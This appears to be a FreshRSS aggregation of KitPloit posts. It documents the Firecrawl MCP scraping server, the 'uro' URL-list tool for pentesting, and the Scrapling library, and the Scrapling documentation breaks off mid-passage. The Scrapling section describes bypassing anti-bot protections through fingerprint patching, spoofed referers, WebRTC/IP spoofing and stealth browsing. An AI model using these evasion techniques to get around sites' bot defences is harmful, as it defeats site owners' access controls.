FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ β˜† βœ‡ KitPloit - PenTest Tools!

Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients

By: Unknown β€” May 6th 2025 at 12:30


A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.

Β 

Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor πŸ–₯️ Note: Requires Cursor version 0.45.6+ For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
  5. Name: "firecrawl-mcp" (or your preferred name)
  6. Type: "command"
  7. Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code: json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
  • Required when using cloud API (default)
  • Optional when using self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
  • Example: https://firecrawl.your-domain.com
  • If not provided, the cloud API will be used (requires API key)

Optional Configuration

Retry Configuration
  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
Credit Usage Monitoring
  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};

These configurations control:

  1. Retry Behavior

  2. Automatically retries failed requests due to rate limits

  3. Uses exponential backoff to avoid overwhelming the API
  4. Example: With default settings, retries will be attempted at:

    • 1st retry: 1 second delay
    • 2nd retry: 2 seconds delay
    • 3rd retry: 4 seconds delay (capped at maxDelay)
  5. Credit Usage Monitoring

  6. Tracks API credit consumption for cloud API usage
  7. Provides warnings at specified thresholds
  8. Helps prevent unexpected service interruption
  9. Example: With default settings:
    • Warning at 1000 credits remaining
    • Critical alert at 100 credits remaining

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

Response includes operation ID for status checking:

{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}

Example response:

{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Uro - Declutters Url Lists For Crawling/Pentesting

By: Unknown β€” May 2nd 2025 at 00:30


Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

It doesn't make any http requests to the URLs and removes: - incremental urls e.g. /page/1/ and /page/2/ - blog posts and similar human written content e.g. /posts/a-brief-history-of-time - urls with same path but parameter value difference e.g. /page.php?id=1 and /page.php?id=2 - images, js, css and other "useless" files


Installation

The recommended way to install uro is as follows:

pipx install uro

Note: If you are using an older version of python, use pip instead of pipx

Basic Usage

The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

cat urls.txt | uro

Advanced usage

Reading urls from a file (-i/--input)

uro -i input.txt

Writing urls to a file (-o/--output)

If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

uro -i input.txt -o output.txt

Whitelist (-w/--whitelist)

uro will ignore all other extensions except the ones provided.

uro -w php asp html

Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Blacklist (-b/--blacklist)

uro will ignore the given extensions.

uro -b jpg png js pdf

Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Filters (-f/--filters)

For granular control, uro supports the following filters:

  1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
  2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
  3. hasext: only output urls that have extensions e.g. http://example.com/page.php
  4. noext: only output urls that have no extensions e.g. http://example.com/page
  5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
  6. keepcontent: keep human written content e.g. blogs.
  7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
  8. vuln: only output urls with parameters that are know to be vulnerable. More info.

Example: uro --filters hasexts hasparams



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown β€” April 28th 2025 at 12:30


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • πŸ”„ Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • πŸ” Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • πŸš€ Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • πŸ”‹ Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚑ Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • πŸ› οΈ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that takes less memory than standard dictionaries with added methods.
  • πŸ“ Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • πŸ”Œ Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • πŸ“˜ Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods and it returns full element Adaptor objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers which makes Fetcher create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher methods is 3.

Hence: All headers generated by stealthy_headers argument can be overwritten by you through the headers argument

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

For the sake of simplicity, expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | βœ”οΈ | | block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | βœ”οΈ | | block_webrtc | Blocks WebRTC entirely. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | addons | List of Firefox addons to use. **Must be paths to extracted addons.** | βœ”οΈ | | humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | βœ”οΈ | | allow_webgl | Enabled by default. Disabling it WebGL not recommended as many WAFs now checks if WebGL is enabled. | βœ”οΈ | | geoip | Recommended to use with proxies; Automatically use IP's longitude, latitude, timezone, country, locale, & spoof the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | βœ”οΈ | | disable_ads | Disabled by default, this installs `uBlock Origin` addon on the browser if enabled. | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode option.

Hence using the real_chrome argument requires that you have Chrome browser installed on your device

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | βœ”οΈ | | disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | βœ”οΈ | | stealth | Enables stealth mode, always check the documentation to see what stealth mode does currently. | βœ”οΈ | | real_chrome | If you have Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | βœ”οΈ | | locale | Set the locale for the browser if wanted. The default value is `en-US`. | βœ”οΈ | | cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | βœ”οΈ | | nstbrowser_mode | Enables NSTBrowser mode, **it have to be used with `cdp_url` argument or it will get completely ignored.** | βœ”οΈ | | nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser's docker browserless config._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
# do something with it...

You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor object as an argument and return True if the condition satisfies or False otherwise like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
